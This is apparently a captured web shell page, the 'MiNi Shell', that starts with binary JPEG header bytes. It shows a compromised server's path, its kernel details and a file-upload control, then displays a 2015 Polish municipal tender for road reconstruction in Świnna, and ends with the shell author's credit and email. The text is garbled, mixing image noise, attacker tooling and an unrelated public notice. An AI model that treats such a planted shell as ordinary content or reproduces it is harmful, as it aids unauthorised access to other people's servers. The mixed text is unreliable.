JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150504/62511-N-2015.html

<p class="kh_header"><b>Świnna: 1). Odbudowa ul. Spacerowej w km 0+309 odnoga  w prawo do km 0+351 
        w Świnnej,     
2). Odbudowa ul. Pod Szkołą  w km 0+000-0+069 w Trzebini,
3). Odbudowa ul. Komarnik w km 0+810 odnoga  w lewo do km 0+865 w 
        Świnnej.</b><br>
<b>Numer ogłoszenia: 62511 - 2015; data zamieszczenia: 04.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Świnnej , ul. Wspólna 13, 34-331 Świnna, woj. śląskie, tel. 033 863-80-23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.swinna.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1). Odbudowa ul. Spacerowej w km 0+309 odnoga  w prawo do km 0+351 
        w Świnnej,     
2). Odbudowa ul. Pod Szkołą  w km 0+000-0+069 w Trzebini,
3). Odbudowa ul. Komarnik w km 0+810 odnoga  w lewo do km 0+865 w 
        Świnnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.	Przedmiotem zamówienia są roboty budowlane polegające na odbudowie następujących dróg gminnych:
1). Odbudowa ul. Spacerowej w km 0+309 odnoga  w prawo do km 0+351 w Świnnej,     
2). Odbudowa ul. Pod Szkołą  w km 0+000-0+069 w Trzebini,
3). Odbudowa ul. Komarnik w km 0+810 odnoga  w lewo do km 0+865 w Świnnej.

1.2.	Zakres przewidywanych  prac: 
   1). Odbudowa ul. Spacerowej w km 0+309 odnoga  w prawo do km 0+351 w Świnnej.     
W celu odbudowy drogi gminnej ul. Spacerowej, w km 0+309 odnoga w prawo do km 0+351 w miejscowości Świnna, projektowane  roboty obejmują:
a) roboty pomiarowe, obsługa geodezyjna  					- 0,042 km
b) korytowanie podłoża na gł. do 50 cm 						- 135,00 m2
c) separacja podłoża geowłókniną 							- 135,00 m2
d) warstwa odcinająca żwirowa, grubości 20 cm  				- 135,00 m2
e) dolna warstwa podbudowy z tłucznia kamiennego				- 135,00 m2
f) górna warstwa podbudowy z tłucznia kamiennego				- 135,00 m2
g) skropienie istniejącej nawierzchni emulsją asfaltową 			- 176,40 m2
h) warstwa wyrównawcza z mieszanki mineralno - asfaltowej		- 176,40 m2
i) warstwa ścieralna z mieszanki mineralno - asfaltowej 			- 176,40 m2
j) obustronne pobocza z mieszanki kruszyw 					-   25,20 m2
k) remont istniejącego przepustu drogowego z rur PVC O 200 z wymianą
   części przelotowej na rury Wipro O 300   					-     7,50 m
l) studnia wpustowa z kręgów betonowych O 500 z kratą żeliwną   	-      1 szt
m) łapacz poprzeczny z elementów betonowych, trapezowych,
   na ławie betonu z rusztem stalowym       					-  14,50m
m) umocnienie skarpy płytami ażurowymi 40x60x10cm 			-  17,60m2 
2). Odbudowa  ul.  Pod Szkołą  w km 0+000-0+069  w  Trzebini.
W celu odbudowy drogi gminnej ul. Pod Szkołą w km 0+000 do km 0+069 o długości 69 mb szerokości warstwy jezdnej 3,00m w miejscowości Trzebinia, projektowane  roboty obejmują:
a) roboty pomiarowe, obsługa geodezyjna  					- 0,069 km
b) korytowanie podłoża na gł. do 40 cm 						- 297,50 m2
c) dolna warstwa podbudowy z tłucznia kamiennego 				- 297,50 m2
d) górna warstwa podbudowy z tłucznia kamiennego 				- 297,50 m2
e) skropienie istniejącej nawierzchni emulsją asfaltową 			- 297,50 m2
f) warstwa wyrównawcza z mieszanki mineralno - asfaltowej 		-   29,75Mg
g) warstwa ścieralna z mieszanki mineralno - asfaltowej 			- 297,50 m2
h) prawostronne pobocze szer. 0,3 m z mieszanki kruszyw 			-     2,07 m3
i) przepust pod  drogą z  rur grubościennych PVC O 200 na ławie żwirowej  - 6,00 m
j) km 0+063 oraz km 0+069 studnie wpustowe z kręgów 
   betonowych O 500 z kratą żeliwną 						-       2 szt
k) km 0+069 korytka betonowe 50x50x15cm, na ławie z betonu (wlot do studni) -   5,00 m
l) ściek z  elementów betonowych 50x50x15cm na ławie z  betonu   	- 52,00 m
ł) łapacz poprzeczny z elementów betonowych, trapezowych 50x38x21cm,
   na ławie z  betonu z rusztem stalowym 						 -   5,00m
3). Odbudowa ul. Komarnik w km 0+810 odnoga  w lewo do km 0+865 w Świnnej,
W celu odbudowy drogi gminnej ul. Komarnik  km 0+810 odnoga  w lewo do km 0+865 o długości 55,00 mb i szerokości warstwy jezdnej 2,70m w miejscowości Świnna, projektowane  roboty obejmują:
a) roboty pomiarowe, obsługa geodezyjna  					- 0,055 km
b) korytowanie podłoża na gł. do 50 cm 						- 192,00 m2
c) separacja podłoża geowłókniną 							- 192,00 m2
d) warstwa odcinająca żwirowa, grubości 20 cm  				- 192,00 m2
e) dolna warstwa podbudowy z tłucznia kamiennego 				- 192,00 m2
f) górna warstwa podbudowy z tłucznia kamiennego 				- 192,00 m2
g) skropienie istniejącej nawierzchni emulsją asfaltową			 - 175,50 m2
h) warstwa wyrównawcza z mieszanki mineralno - asfaltowej		 - 26,33 Mg
i) warstwa ścieralna z mieszanki mineralno - asfaltowej 			 - 175,50 m2
j) lewostronne pobocze z mieszanki kruszyw 					 -   16,50 m2
m) umocnienie skarpy płytami ażurowymi  40x60x10cm osadzonymi na 
    fundamencie z krawężnika betonowego 15x30x100 na ławie z  betonu -   15,20m2 
Odbudowa dróg realizowana jest w ramach środków na usuwanie skutków klęsk żywiołowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.12.00-0, 45.23.32.20-7, 45.23.24.52-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego  przez Wykonawcę  oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek posiadania wiedzy i doświadczenia niezbędnego do należytego wykonania zamówienia jeśli wykaże, że  w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  to w  tym okresie, wykonał w sposób należyty   co najmniej jedno  zadanie odpowiadające   swoim  rodzajem i wartością  przedmiotowi   zamówienia. ( Przez roboty odpowiadające  przedmiotowi  zamówienia  rozumie się, budowę, remont  lub 
przebudowę  jednej drogi  o wartości nie mniejszej niż  40 000 zł brutto)   oraz załączy  dowody potwierdzające, że roboty te zostały  wykonane zgodnie z zasadami   sztuki budowlanej i  prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego  przez Wykonawcę  oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą się ubiegać Wykonawcy, którzy  dysponują osobami  zdolnymi  do  wykonania  zamówienia,  które  będą  uczestniczyć  w wykonywaniu  zamówienia, tj.: osobami posiadającymi uprawnienia określone przepisami Prawa budowlanego do pełnienia funkcji kierownika budowy -    co  najmniej   jedna  osoba  posiadająca  uprawnienia budowlane do kierowania budowami  w zakresie robót drogowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego  przez Wykonawcę  oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagane przez Zamawiającego:
1. Wypełniony  formularz   ofertowy   stanowiący    kartę   tytułową    oferty,   dostarczony  Wykonawcom  wraz  ze  Specyfikacją  Istotnych   Warunków  Zamówienia  (Załącznik  Nr 1),
2.  Wykaz  osób   uprawnionych   do   podpisywania   dokumentów   przetargowych   i podejmowania  zobowiązań  w  imieniu  Wykonawcy,  oraz  pełnomocnictwa  udzielane osobom podpisującym dokumenty ofertowe, o ile prawo do  reprezentowania Wykonawcy  w  powyższym zakresie    nie wynika wprost z dokumentu rejestrowego. 
3. Kosztorys  ofertowy,  sporządzony  na  bazie  przedmiarów  robót,    uproszczonych  dokumentacji  technicznych,  Specyfikacja   Techniczna Wykonania i   Odbioru  Robót Budowlanych.
4. Pełnomocnictwo udzielone reprezentantowi wykonawców ubiegających się o udzielenie zamówienia publicznego wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres rękojmi - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych dopuszcza  zmiany postanowień umowy w następujących przypadkach:
-  dopuszcza  się  zmianę terminu wykonania robót pod warunkiem wystąpienia  
    niekorzystnych warunków atmosferycznych (długotrwałe opady deszczu,  wichury przez okres dłuższy niż 5 dni )   mających  faktyczny wpływ na  realizację robót     budowlanych  prowadzonych na otwartej przestrzeni, potwierdzone przez Inspektora   Nadzoru  stosownym protokołem. Wprowadzenie zmiany do umowy wymaga spisania protokołu konieczności, zaakceptowanego przez  obie strony  i  następować będzie aneksem do  umowy.
 -  wystąpienia w trakcie prowadzenia robót nieprzewidzianych okoliczności np.  właściciel działki stwierdzi, że została narusza własność jego działki, a więc konieczne będzie      wykonanie pomiaru geodezyjnego ustalającego granice  przebiegu  działki, co  zostanie    potwierdzone   przez  Inspektora   Nadzoru  stosownym   protokołem.
 Ponieważ wykonanie pomiaru geodezyjnego wymaga dłuższego okresu realizacji,    
 Zamawiający może zrezygnować z wykonania robót ustalonych w  przedmiarze robót i obniżyć wynagrodzenie wykonawcy o wartość niewykonanych robót zgodnie z     
     kosztorysem ofertowym, co  zostanie  potwierdzone  przez  Inspektora   Nadzoru 
     stosownym  protokołem.
     Wprowadzenie zmiany do umowy wymaga spisania protokołu konieczności,  
     zaakceptowanego przez  obie strony  i  następować będzie aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.swinna.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Świnnej ul. Wspólna 13 34-331 Świnna - pok. Nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2015 godzina 10:30, miejsce: Urząd Gminy w Świnnej ul. Wspólna 13 34-331 Świnna - pok. Nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com